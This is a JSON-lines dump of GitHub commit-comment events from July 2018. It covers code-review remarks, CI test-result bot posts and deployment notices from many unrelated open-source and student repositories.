{"id":"7978325829","type":"CommitCommentEvent","actor":{"login":"temrich"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29738660,"position":160,"line":160,"path":"mlvision/MLVisionExampleObjc/CameraViewController.m","commit_id":"d49e3012345297cbd589d388c2e703c306ec800e","created_at":"2018-07-17T17:57:54Z","updated_at":"2018-07-17T17:57:54Z","author_association":"NONE","body":"nit: could maybe increase this to hd1280x720, which will show full screen live camera feed."}},"created_at":"2018-07-17T17:57:54Z"}
{"id":"7978326483","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29738661,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-17T17:58:02Z","updated_at":"2018-07-17T17:58:02Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-MacOS-10.9-clang: Tests Failed (2368 of 2935 tests passed, 56 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 563 tests had: Table big diffs.\n * 76 tests had: ESO big diffs.\n * 99 tests had: AUD diffs.\n * 156 tests had: BND diffs.\n * 168 tests had: ESO small diffs.\n * 151 tests had: MDD diffs.\n * 156 tests had: MTD diffs.\n * 151 tests had: RDD diffs.\n * 99 tests had: MTR small diffs.\n * 36 tests had: MTR big diffs.\n * 18 tests had: ERR diffs.\n * 1 test had: Table small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 56\n * Failed: 567\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.68%25-red.png)</a> \n"}},"created_at":"2018-07-17T17:58:02Z"}
{"id":"7978328425","type":"CommitCommentEvent","actor":{"login":"renzhezizhi"},"repo":{"name":"bluo999/Dev"},"payload":{"comment":{"id":29738663,"position":6,"line":3,"path":"src/router.js","commit_id":"e024cc80f2027f22e0eb9d654f257a5d3de5f447","created_at":"2018-07-17T17:58:24Z","updated_at":"2018-07-17T17:58:24Z","author_association":"COLLABORATOR","body":"Consider use createStackNavigator instead of StackNavigator function since you are using the latest react navigation module and it deprecates the StackNavigator function"}},"created_at":"2018-07-17T17:58:24Z"}
{"id":"7978332526","type":"CommitCommentEvent","actor":{"login":"andrewrk"},"repo":{"name":"ofelas/zigtest"},"payload":{"comment":{"id":29738670,"position":null,"line":null,"path":null,"commit_id":"1e225b4bb5a7fd23121da29ef70368d5466a388f","created_at":"2018-07-17T17:59:10Z","updated_at":"2018-07-17T17:59:10Z","author_association":"NONE","body":":tada: "}},"created_at":"2018-07-17T17:59:10Z"}
{"id":"7978332530","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29738671,"position":null,"line":null,"path":null,"commit_id":"a5d211e8c4c0362ee0e9c7e4df89ea3dcba27ffa","created_at":"2018-07-17T17:59:10Z","updated_at":"2018-07-17T17:59:10Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-48](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-48).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-48-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-17T17:59:10Z"}
{"id":"7978332660","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29738672,"position":null,"line":null,"path":null,"commit_id":"9b60cfa52acb373a8bbb9df6adee907c7735f0e3","created_at":"2018-07-17T17:59:11Z","updated_at":"2018-07-17T17:59:11Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2r](https://circleci2r-static-docs.pantheonsite.io/docs) Multidev environment:\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/9b60cfa52acb373a8bbb9df6adee907c7735f0e3/.circleci/config.yml)\n"}},"created_at":"2018-07-17T17:59:11Z"}
{"id":"7978333404","type":"CommitCommentEvent","actor":{"login":"salexander6"},"repo":{"name":"Faithlife/styled-ui"},"payload":{"comment":{"id":29738674,"position":5,"line":10,"path":"VersionHistory.md","commit_id":"1e194d902e570a0991b70ebc8af67d22e708c30d","created_at":"2018-07-17T17:59:20Z","updated_at":"2018-07-17T17:59:20Z","author_association":"NONE","body":"Documentation! 🥇 "}},"created_at":"2018-07-17T17:59:20Z"}
{"id":"7978334153","type":"CommitCommentEvent","actor":{"login":"bbdaiya"},"repo":{"name":"shivam-munchi/newsApp"},"payload":{"comment":{"id":29738676,"position":292,"line":292,"path":"app/src/main/java/com/example/delhivery/newsapp/MainActivity.java","commit_id":"edd7adb61705cbfb31a6414ecc3f751c312cf6d1","created_at":"2018-07-17T17:59:29Z","updated_at":"2018-07-17T17:59:29Z","author_association":"NONE","body":"Where are you making for API request?"}},"created_at":"2018-07-17T17:59:29Z"}
{"id":"7978334569","type":"CommitCommentEvent","actor":{"login":"mobe-mobe"},"repo":{"name":"FBX-2018-TeamTBD/goals"},"payload":{"comment":{"id":29738678,"position":31,"line":31,"path":"app/src/main/java/com/example/cassandrakane/goalz/AddGoalActivity.java","commit_id":"122d74679761649f9440286fc1f2b768ddf35aa3","created_at":"2018-07-17T17:59:34Z","updated_at":"2018-07-17T17:59:34Z","author_association":"CONTRIBUTOR","body":"Use an enum here?"}},"created_at":"2018-07-17T17:59:34Z"}
{"id":"7978335267","type":"CommitCommentEvent","actor":{"login":"pascallanger"},"repo":{"name":"pascallanger/DIY-Multiprotocol-TX-Module"},"payload":{"comment":{"id":29738679,"position":null,"line":null,"path":null,"commit_id":"8906c85d067ae8f0b93dfe3dde6483f151914d10","created_at":"2018-07-17T17:59:42Z","updated_at":"2018-07-17T17:59:42Z","author_association":"OWNER","body":"This is a known issue for some time. There is an issue open for it. I'll work on it soon..."}},"created_at":"2018-07-17T17:59:42Z"}
{"id":"7978337010","type":"CommitCommentEvent","actor":{"login":"lukaszkinder"},"repo":{"name":"TomaszKrzesinski/StarterKitChess"},"payload":{"comment":{"id":29738683,"position":19,"line":22,"path":"ChessAlgorithms/src/main/java/com/capgemini/chess/algorithms/implementation/MoveValidator.java","commit_id":"f358cff91ecd862bb374b242e192a89fc5187232","created_at":"2018-07-17T18:00:02Z","updated_at":"2018-07-17T18:00:02Z","author_association":"NONE","body":"ds"}},"created_at":"2018-07-17T18:00:02Z"}
{"id":"7978344064","type":"CommitCommentEvent","actor":{"login":"ian-culleton"},"repo":{"name":"ian-culleton/git-comments"},"payload":{"comment":{"id":29738701,"position":16,"line":13,"path":"views/footer.ejs","commit_id":"a94578594e5799f6ffbabf9b4d8c36ff9a7a30cd","created_at":"2018-07-17T18:01:16Z","updated_at":"2018-07-17T18:01:16Z","author_association":"OWNER","body":"This is code review."}},"created_at":"2018-07-17T18:01:16Z"}
{"id":"7978344503","type":"CommitCommentEvent","actor":{"login":"temrich"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29738702,"position":158,"line":158,"path":"mlvision/MLVisionExampleObjc/CameraViewController.m","commit_id":"d49e3012345297cbd589d388c2e703c306ec800e","created_at":"2018-07-17T18:01:21Z","updated_at":"2018-07-17T18:01:21Z","author_association":"NONE","body":"nit: self.sessionQueue\r\n\r\nif you decide to call properties rather than ivars throughout this file."}},"created_at":"2018-07-17T18:01:21Z"}
{"id":"7978345561","type":"CommitCommentEvent","actor":{"login":"lukaszkinder"},"repo":{"name":"TomaszKrzesinski/StarterKitChess"},"payload":{"comment":{"id":29738704,"position":13,"line":21,"path":"ChessAlgorithms/src/main/java/com/capgemini/chess/algorithms/implementation/MoveValidator.java","commit_id":"f358cff91ecd862bb374b242e192a89fc5187232","created_at":"2018-07-17T18:01:32Z","updated_at":"2018-07-17T18:01:32Z","author_association":"NONE","body":"metody z małej litery"}},"created_at":"2018-07-17T18:01:32Z"}
{"id":"7978346151","type":"CommitCommentEvent","actor":{"login":"tghelere"},"repo":{"name":"renatonascalves/woocommerce-pagseguro"},"payload":{"comment":{"id":29738706,"position":null,"line":null,"path":null,"commit_id":"0617a42238bd8817372ee17f4f001558029dffe8","created_at":"2018-07-17T18:01:38Z","updated_at":"2018-07-17T18:01:38Z","author_association":"NONE","body":"Fala @renatonascalves, td bem?\r\nComo está esta feature? Como posso contribuir?\r\nE o que está faltando para ter uma primeira versão?\r\n\r\nAbraço"}},"created_at":"2018-07-17T18:01:38Z"}
{"id":"7978352183","type":"CommitCommentEvent","actor":{"login":"bbdaiya"},"repo":{"name":"shivam-munchi/newsApp"},"payload":{"comment":{"id":29738723,"position":304,"line":304,"path":"app/src/main/java/com/example/delhivery/newsapp/MainActivity.java","commit_id":"edd7adb61705cbfb31a6414ecc3f751c312cf6d1","created_at":"2018-07-17T18:02:45Z","updated_at":"2018-07-17T18:02:45Z","author_association":"NONE","body":"I wanted country to be fetched from users location. :D"}},"created_at":"2018-07-17T18:02:45Z"}
{"id":"7978352416","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29738724,"position":null,"line":null,"path":null,"commit_id":"ca27b3bde58bac9f1c5618fdd0d665366fc71665","created_at":"2018-07-17T18:02:47Z","updated_at":"2018-07-17T18:02:47Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2r](https://circleci2r-static-docs.pantheonsite.io/docs) Multidev environment:\n- [composer.lock](https://github.com/pantheon-systems/documentation/commit/ca27b3bde58bac9f1c5618fdd0d665366fc71665/composer.lock)\n"}},"created_at":"2018-07-17T18:02:47Z"}
{"id":"7978358376","type":"CommitCommentEvent","actor":{"login":"bbdaiya"},"repo":{"name":"shivam-munchi/newsApp"},"payload":{"comment":{"id":29738735,"position":36,"line":36,"path":"app/src/main/java/com/example/delhivery/newsapp/NewsActivity.java","commit_id":"edd7adb61705cbfb31a6414ecc3f751c312cf6d1","created_at":"2018-07-17T18:03:57Z","updated_at":"2018-07-17T18:03:57Z","author_association":"NONE","body":"Nice! Null check is important most places"}},"created_at":"2018-07-17T18:03:57Z"}
{"id":"7978359549","type":"CommitCommentEvent","actor":{"login":"stefano2019"},"repo":{"name":"stefano2019/progetto0"},"payload":{"comment":{"id":29738737,"position":1,"line":1,"path":"README.md","commit_id":"d3b3d4b0154823dd7367d67a3aa13fc72f53f4eb","created_at":"2018-07-17T18:04:11Z","updated_at":"2018-07-17T18:04:11Z","author_association":"OWNER","body":"commento file di testo"}},"created_at":"2018-07-17T18:04:11Z"}
{"id":"7978364842","type":"CommitCommentEvent","actor":{"login":"lukaszkinder"},"repo":{"name":"TomaszKrzesinski/StarterKitChess"},"payload":{"comment":{"id":29738753,"position":48,"line":267,"path":"ChessAlgorithms/src/main/java/com/capgemini/chess/algorithms/implementation/BoardManager.java","commit_id":"483fc8491a1d115c4bb15256751456cf50d2ee49","created_at":"2018-07-17T18:05:11Z","updated_at":"2018-07-17T18:05:11Z","author_association":"NONE","body":"Szachy zasad juz nie zmienią i bez króla nie ma gry. Ale w projekcie  innej gry w której zasady będą się zmieniać naginanie implementacji do testów będzie nie akceptowalne"}},"created_at":"2018-07-17T18:05:11Z"}
{"id":"7978366852","type":"CommitCommentEvent","actor":{"login":"bbdaiya"},"repo":{"name":"shivam-munchi/newsApp"},"payload":{"comment":{"id":29738760,"position":62,"line":62,"path":"app/src/main/java/com/example/delhivery/newsapp/NewsActivity.java","commit_id":"edd7adb61705cbfb31a6414ecc3f751c312cf6d1","created_at":"2018-07-17T18:05:34Z","updated_at":"2018-07-17T18:05:34Z","author_association":"NONE","body":"Constants like API_KEY should be in a separate class."}},"created_at":"2018-07-17T18:05:34Z"}
{"id":"7978368254","type":"CommitCommentEvent","actor":{"login":"straight-shoota"},"repo":{"name":"kemalcr/kemal"},"payload":{"comment":{"id":29738765,"position":10,"line":63,"path":"spec/config_spec.cr","commit_id":"09bb1fcd4073a374b3a61c99e48e05a866b23c08","created_at":"2018-07-17T18:05:49Z","updated_at":"2018-07-17T18:05:49Z","author_association":"CONTRIBUTOR","body":"This wouldn't be useful at all because it would use more or less the same implementation as the constant value that is to be testes.\r\n\r\nThere shouldn't be any spec for a specific version value. Just make sure it's not empty."}},"created_at":"2018-07-17T18:05:49Z"}
{"id":"7978369821","type":"CommitCommentEvent","actor":{"login":"lukaszkinder"},"repo":{"name":"TomaszKrzesinski/StarterKitChess"},"payload":{"comment":{"id":29738771,"position":66,"line":295,"path":"ChessAlgorithms/src/main/java/com/capgemini/chess/algorithms/implementation/BoardManager.java","commit_id":"483fc8491a1d115c4bb15256751456cf50d2ee49","created_at":"2018-07-17T18:06:08Z","updated_at":"2018-07-17T18:06:08Z","author_association":"NONE","body":"uzywaj spójnego formatowania. Najlepiej ustaw automatyczne auto formatowanie po SAVE"}},"created_at":"2018-07-17T18:06:08Z"}
{"id":"7978370009","type":"CommitCommentEvent","actor":{"login":"DioBrandoZ"},"repo":{"name":"DioBrandoZ/Dio"},"payload":{"comment":{"id":29738772,"position":null,"line":null,"path":null,"commit_id":"53d9e29fafbe9634bddaa9d7d85f2011981d137a","created_at":"2018-07-17T18:06:10Z","updated_at":"2018-07-17T18:06:10Z","author_association":"OWNER","body":"大学期间写的代码"}},"created_at":"2018-07-17T18:06:10Z"}
{"id":"7978370531","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"radare/radare2book"},"payload":{"comment":{"id":29738777,"position":5,"line":5,"path":"credits/credits.md","commit_id":"0b0d750553dd684a43cdae0bde1e326915722df1","created_at":"2018-07-17T18:06:15Z","updated_at":"2018-07-17T18:06:15Z","author_association":"OWNER","body":"Usually the first pages come with a mention to someone.\n\n> On 17 Jul 2018, at 19:49, Anton Kochkov <notifications@github.com> wrote:\n> \n> I think we should also move credits at the end of the book, nobody usually reads this part anyway.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-17T18:06:15Z"}
{"id":"7978371704","type":"CommitCommentEvent","actor":{"login":"browner12"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":29738780,"position":null,"line":null,"path":null,"commit_id":"57d7b1fef9fa48899b99dd240d89a2ef4cbafc4b","created_at":"2018-07-17T18:06:28Z","updated_at":"2018-07-17T18:06:28Z","author_association":"CONTRIBUTOR","body":"what are you providing as input to the `...$patterns` parameter?"}},"created_at":"2018-07-17T18:06:28Z"}
{"id":"7978372323","type":"CommitCommentEvent","actor":{"login":"saloponov"},"repo":{"name":"Acumatica/Acuminator"},"payload":{"comment":{"id":29738781,"position":69,"line":112,"path":"src/Acuminator/Acuminator.Analyzers/Analyzers/DAC/DacDeclarationAnalyzer.cs","commit_id":"9ff4da93875be60288aed9957874039ba1d2fbdd","created_at":"2018-07-17T18:06:34Z","updated_at":"2018-07-17T18:06:34Z","author_association":"COLLABORATOR","body":"Where can I implement this array of constant strings?"}},"created_at":"2018-07-17T18:06:34Z"}
{"id":"7978375388","type":"CommitCommentEvent","actor":{"login":"bbdaiya"},"repo":{"name":"shivam-munchi/newsApp"},"payload":{"comment":{"id":29738790,"position":60,"line":60,"path":"app/src/main/java/com/example/delhivery/newsapp/MainActivity.java","commit_id":"edd7adb61705cbfb31a6414ecc3f751c312cf6d1","created_at":"2018-07-17T18:07:12Z","updated_at":"2018-07-17T18:07:12Z","author_association":"NONE","body":"Why?\r\n"}},"created_at":"2018-07-17T18:07:12Z"}
{"id":"7978376579","type":"CommitCommentEvent","actor":{"login":"aleraymann"},"repo":{"name":"aleraymann/ERP"},"payload":{"comment":{"id":29738793,"position":null,"line":null,"path":null,"commit_id":"76c339e4889a55ecad02d3120d8c30f49f1e67bb","created_at":"2018-07-17T18:07:26Z","updated_at":"2018-07-17T18:07:26Z","author_association":"OWNER","body":"arquivos add com sucesso"}},"created_at":"2018-07-17T18:07:26Z"}
{"id":"7978386791","type":"CommitCommentEvent","actor":{"login":"Antispiner"},"repo":{"name":"Antispiner/vkoshman"},"payload":{"comment":{"id":29738812,"position":null,"line":null,"path":null,"commit_id":"b290dc87f4866771fc6a3ada19ef4b7e86050a94","created_at":"2018-07-17T18:09:27Z","updated_at":"2018-07-17T18:09:27Z","author_association":"OWNER","body":"asd"}},"created_at":"2018-07-17T18:09:27Z"}
{"id":"7978389381","type":"CommitCommentEvent","actor":{"login":"BHMOO028"},"repo":{"name":"BHMOO028/LION-MOORE---FLYN-MOTION"},"payload":{"comment":{"id":29738816,"position":null,"line":null,"path":null,"commit_id":"4ca82c6d5a828c107c06209604841f4e8e8f3a8b","created_at":"2018-07-17T18:09:58Z","updated_at":"2018-07-17T18:09:58Z","author_association":"OWNER","body":"In 1^¦¶§°¬~0.005551 ¢©®™ 0120413 "}},"created_at":"2018-07-17T18:09:58Z"}
{"id":"7978389446","type":"CommitCommentEvent","actor":{"login":"bbdaiya"},"repo":{"name":"shivam-munchi/newsApp"},"payload":{"comment":{"id":29738817,"position":69,"line":69,"path":"app/src/main/java/com/example/delhivery/newsapp/NewsAdapter.java","commit_id":"edd7adb61705cbfb31a6414ecc3f751c312cf6d1","created_at":"2018-07-17T18:09:59Z","updated_at":"2018-07-17T18:09:59Z","author_association":"NONE","body":"You are reusing the same code again. Function."}},"created_at":"2018-07-17T18:09:59Z"}
{"id":"7978389518","type":"CommitCommentEvent","actor":{"login":"wimglenn"},"repo":{"name":"pypa/wheel"},"payload":{"comment":{"id":29738818,"position":null,"line":null,"path":null,"commit_id":"50e11a0c10ad33eea4e887ea0c1fb6133f0a74d8","created_at":"2018-07-17T18:10:00Z","updated_at":"2018-07-17T18:10:00Z","author_association":"CONTRIBUTOR","body":"Here it is: https://github.com/pypa/wheel/pull/245  "}},"created_at":"2018-07-17T18:10:00Z"}
{"id":"7978391325","type":"CommitCommentEvent","actor":{"login":"earwin"},"repo":{"name":"fairwaves/pcapsipdump"},"payload":{"comment":{"id":29738821,"position":null,"line":null,"path":null,"commit_id":"558aaf2170373a461302885078610609fd96c8f4","created_at":"2018-07-17T18:10:21Z","updated_at":"2018-07-17T18:10:21Z","author_association":"NONE","body":"Note that this prevents pcapsipdump from processing vlan-encapsulated streams (unless listening on a vlan interface)."}},"created_at":"2018-07-17T18:10:21Z"}
{"id":"7978393373","type":"CommitCommentEvent","actor":{"login":"DanielWeeber"},"repo":{"name":"KraigM/homebridge-harmonyhub"},"payload":{"comment":{"id":29738824,"position":null,"line":null,"path":null,"commit_id":"33ae87893f22ecae9aef39e47db15536793c4009","created_at":"2018-07-17T18:10:46Z","updated_at":"2018-07-17T18:10:46Z","author_association":"NONE","body":"I'm forced to type in user/password even though I do not have a Harmony Link. This should not be the case."}},"created_at":"2018-07-17T18:10:46Z"}
{"id":"7978394354","type":"CommitCommentEvent","actor":{"login":"juribeparada"},"repo":{"name":"juribeparada/MMDVM_HS"},"payload":{"comment":{"id":29738827,"position":null,"line":null,"path":null,"commit_id":"46ba5cc4f74d072aa545fd54fc5b64bb473e65bd","created_at":"2018-07-17T18:10:58Z","updated_at":"2018-07-17T18:10:58Z","author_association":"OWNER","body":"OK, I will try to see. Your noise floor is a little high, -104 dBm, but I think nothing to worry. I noted that some homebrew boards produce a little more noise compared with single PCB MMDVM_HS. Have you tried any other frequency?"}},"created_at":"2018-07-17T18:10:58Z"}
{"id":"7978394697","type":"CommitCommentEvent","actor":{"login":"bbdaiya"},"repo":{"name":"shivam-munchi/newsApp"},"payload":{"comment":{"id":29738830,"position":12,"line":12,"path":"app/src/main/java/com/example/delhivery/newsapp/SettingsActivity.java","commit_id":"edd7adb61705cbfb31a6414ecc3f751c312cf6d1","created_at":"2018-07-17T18:11:02Z","updated_at":"2018-07-17T18:11:02Z","author_association":"NONE","body":"TAG"}},"created_at":"2018-07-17T18:11:02Z"}
{"id":"7978396556","type":"CommitCommentEvent","actor":{"login":"lukaszkinder"},"repo":{"name":"TomaszKrzesinski/StarterKitChess"},"payload":{"comment":{"id":29738833,"position":14,"line":22,"path":"ChessAlgorithms/src/main/java/com/capgemini/chess/algorithms/implementation/MoveValidator.java","commit_id":"483fc8491a1d115c4bb15256751456cf50d2ee49","created_at":"2018-07-17T18:11:24Z","updated_at":"2018-07-17T18:11:24Z","author_association":"NONE","body":"użyj dedykowanych wyjątków"}},"created_at":"2018-07-17T18:11:24Z"}
{"id":"7978396798","type":"CommitCommentEvent","actor":{"login":"RGaudoin"},"repo":{"name":"RGaudoin/website"},"payload":{"comment":{"id":29738834,"position":2,"line":2,"path":"lipsum.txt","commit_id":"282e2c3225ebfa23b3133bd49595bc3f481d7e8c","created_at":"2018-07-17T18:11:27Z","updated_at":"2018-07-17T18:11:27Z","author_association":"OWNER","body":"### lipsum really???\r\n\r\nbla"}},"created_at":"2018-07-17T18:11:27Z"}
{"id":"7978398231","type":"CommitCommentEvent","actor":{"login":"dinatih"},"repo":{"name":"DavyJonesLocker/client_side_validations"},"payload":{"comment":{"id":29738842,"position":null,"line":null,"path":null,"commit_id":"35501c1b120a3d0d5b8a907e4edd6d7b826378e6","created_at":"2018-07-17T18:11:44Z","updated_at":"2018-07-17T18:11:44Z","author_association":"NONE","body":"Hello @tagliala ! How can we add custom remote validator without the  ClientSideValidations::Middleware::Base like in the wiki ? 😟 Is there another way to add custom remote validators, please ? \r\n"}},"created_at":"2018-07-17T18:11:44Z"}
{"id":"7978398960","type":"CommitCommentEvent","actor":{"login":"BHMOO028"},"repo":{"name":"BHMOO028/LION-MOORE---FLYN-MOTION"},"payload":{"comment":{"id":29738843,"position":null,"line":null,"path":null,"commit_id":"4ca82c6d5a828c107c06209604841f4e8e8f3a8b","created_at":"2018-07-17T18:11:53Z","updated_at":"2018-07-17T18:11:53Z","author_association":"OWNER","body":"LIONMOORE /JERRY DANGEROUS DAN /JAH JERRY /JERRY DAN/JERRY ©®™0120413 "}},"created_at":"2018-07-17T18:11:53Z"}
{"id":"7978399941","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29738850,"position":7,"line":144,"path":"src/opnsense/mvc/app/library/OPNsense/Backup/Nextcloud.php","commit_id":"50fb5bcb0c8f1c97653acd282394bdadb4e9b9ce","created_at":"2018-07-17T18:12:06Z","updated_at":"2018-07-17T18:12:06Z","author_association":"MEMBER","body":"@fabianfrz thanks 👍 restore works too I guess? did you also try a manual restore from the GUI with such a file or restore an older backup that doesn't have the headers? all these should work"}},"created_at":"2018-07-17T18:12:06Z"}
{"id":"7978402711","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29738855,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-17T18:12:37Z","updated_at":"2018-07-17T18:12:37Z","author_association":"NONE","body":"develop (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2319 of 2319 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-17T18:12:37Z"}
{"id":"7978403618","type":"CommitCommentEvent","actor":{"login":"markusgay"},"repo":{"name":"percipiomedia/ignite"},"payload":{"comment":{"id":29738858,"position":6,"line":46,"path":"modules/docker-jobcase/prod/run.sh","commit_id":"5e9093679d7e7c3673d8e845fc6fcc08d14d9383","created_at":"2018-07-17T18:12:47Z","updated_at":"2018-07-17T18:12:47Z","author_association":"MEMBER","body":"closing \" missing"}},"created_at":"2018-07-17T18:12:47Z"}
{"id":"7978405915","type":"CommitCommentEvent","actor":{"login":"markusgay"},"repo":{"name":"percipiomedia/ignite"},"payload":{"comment":{"id":29738864,"position":9,"line":49,"path":"modules/docker-jobcase/prod/run.sh","commit_id":"5e9093679d7e7c3673d8e845fc6fcc08d14d9383","created_at":"2018-07-17T18:13:12Z","updated_at":"2018-07-17T18:13:12Z","author_association":"MEMBER","body":"closing \" missing"}},"created_at":"2018-07-17T18:13:12Z"}
{"id":"7978406456","type":"CommitCommentEvent","actor":{"login":"KentJames"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29738865,"position":null,"line":null,"path":null,"commit_id":"3c32418c59d1df48c66a5f2bc817d7c01003fec3","created_at":"2018-07-17T18:13:17Z","updated_at":"2018-07-17T18:13:17Z","author_association":"COLLABORATOR","body":"Yeah that’s a good idea. I think with the grid size we are using, it’s not really too much of a problem anyway if I am not gulping too much at once. Not ideal in the long run, but should walk before I can run..\n\nI noticed Bifrosts linalg, and I’ll probably use that for now. I’ll see if I can quickly throw something together using just python and the bifrost objects before I start writing any cuda kernels myself.\n\n\n\n> On 17 Jul 2018, at 10:57, jaycedowell <notifications@github.com> wrote:\n> \n> Maybe the thing to do is to start out with standard cuBLAS operations and just see where that ends up in terms of performance. That may not be the optimal choice in the long run but it does provide a relatively straight forward path to getting something that at least runs. The bifrost linalg module implements a few matrix multiplication styles and we are currently using it for the wideband FX correlator.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/nithyanandan/EPIC/commit/3c32418c59d1df48c66a5f2bc817d7c01003fec3#commitcomment-29738651>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AB73hHOBX1TkDSac5WTzB8n_tWB1Re0Fks5uHiV4gaJpZM4VTMN8>.\n> \n\n"}},"created_at":"2018-07-17T18:13:17Z"}
{"id":"7978407037","type":"CommitCommentEvent","actor":{"login":"RGaudoin"},"repo":{"name":"RGaudoin/website"},"payload":{"comment":{"id":29738866,"position":null,"line":null,"path":null,"commit_id":"282e2c3225ebfa23b3133bd49595bc3f481d7e8c","created_at":"2018-07-17T18:13:24Z","updated_at":"2018-07-17T18:13:24Z","author_association":"OWNER","body":"### lipsum really???\r\n\r\n*what*"}},"created_at":"2018-07-17T18:13:24Z"}
{"id":"7978410645","type":"CommitCommentEvent","actor":{"login":"lukaszkinder"},"repo":{"name":"TomaszKrzesinski/StarterKitChess"},"payload":{"comment":{"id":29738872,"position":28,"line":40,"path":"ChessAlgorithms/src/main/java/com/capgemini/chess/algorithms/implementation/MoveValidator.java","commit_id":"483fc8491a1d115c4bb15256751456cf50d2ee49","created_at":"2018-07-17T18:14:07Z","updated_at":"2018-07-17T18:14:07Z","author_association":"NONE","body":"po co przechowywać informacje o złych ruchach jak można tylko zawierać poprawne?"}},"created_at":"2018-07-17T18:14:07Z"}
{"id":"7978411320","type":"CommitCommentEvent","actor":{"login":"Antispiner"},"repo":{"name":"Antispiner/vkoshman"},"payload":{"comment":{"id":29738873,"position":null,"line":null,"path":null,"commit_id":"6dd306743b535172355963ee2feb7f63a5297a11","created_at":"2018-07-17T18:14:14Z","updated_at":"2018-07-17T18:14:14Z","author_association":"OWNER","body":"asd"}},"created_at":"2018-07-17T18:14:14Z"}
{"id":"7978411831","type":"CommitCommentEvent","actor":{"login":"DarkoBomer"},"repo":{"name":"DarkoBomer/SummerHolidayProject"},"payload":{"comment":{"id":29738874,"position":null,"line":null,"path":null,"commit_id":"7483a17db9ae77ee2ba535ea3dc10d45ff779b78","created_at":"2018-07-17T18:14:19Z","updated_at":"2018-07-17T18:14:19Z","author_association":"OWNER","body":"Haven't added Pod yet.\r\n(DJI-SDK, GoogleMaps, AMap3DMap, AMapSearch, AMapLocation, ffmpeg)"}},"created_at":"2018-07-17T18:14:19Z"}
{"id":"7978420342","type":"CommitCommentEvent","actor":{"login":"Rexagon"},"repo":{"name":"Rexagon/moysklad-courier"},"payload":{"comment":{"id":29738895,"position":null,"line":null,"path":null,"commit_id":"fca8a0609e48937a351ac2598f42d21d75a58f84","created_at":"2018-07-17T18:15:55Z","updated_at":"2018-07-17T18:15:55Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Добавить цвет для суммы заказа](https://trello.com/c/r9D0orQf/10-%D0%B4%D0%BE%D0%B1%D0%B0%D0%B2%D0%B8%D1%82%D1%8C-%D1%86%D0%B2%D0%B5%D1%82-%D0%B4%D0%BB%D1%8F-%D1%81%D1%83%D0%BC%D0%BC%D1%8B-%D0%B7%D0%B0%D0%BA%D0%B0%D0%B7%D0%B0)"}},"created_at":"2018-07-17T18:15:55Z"}
{"id":"7978421134","type":"CommitCommentEvent","actor":{"login":"lukaszkinder"},"repo":{"name":"TomaszKrzesinski/StarterKitChess"},"payload":{"comment":{"id":29738896,"position":null,"line":null,"path":null,"commit_id":"50a65f6a183d2ccfbab728d6e68d9472d731bead","created_at":"2018-07-17T18:16:04Z","updated_at":"2018-07-17T18:16:04Z","author_association":"NONE","body":"gitignore nie został dodany do projektu i do repozytorium zostały dodane pliki które nie powinny się w nim znajdować"}},"created_at":"2018-07-17T18:16:04Z"}
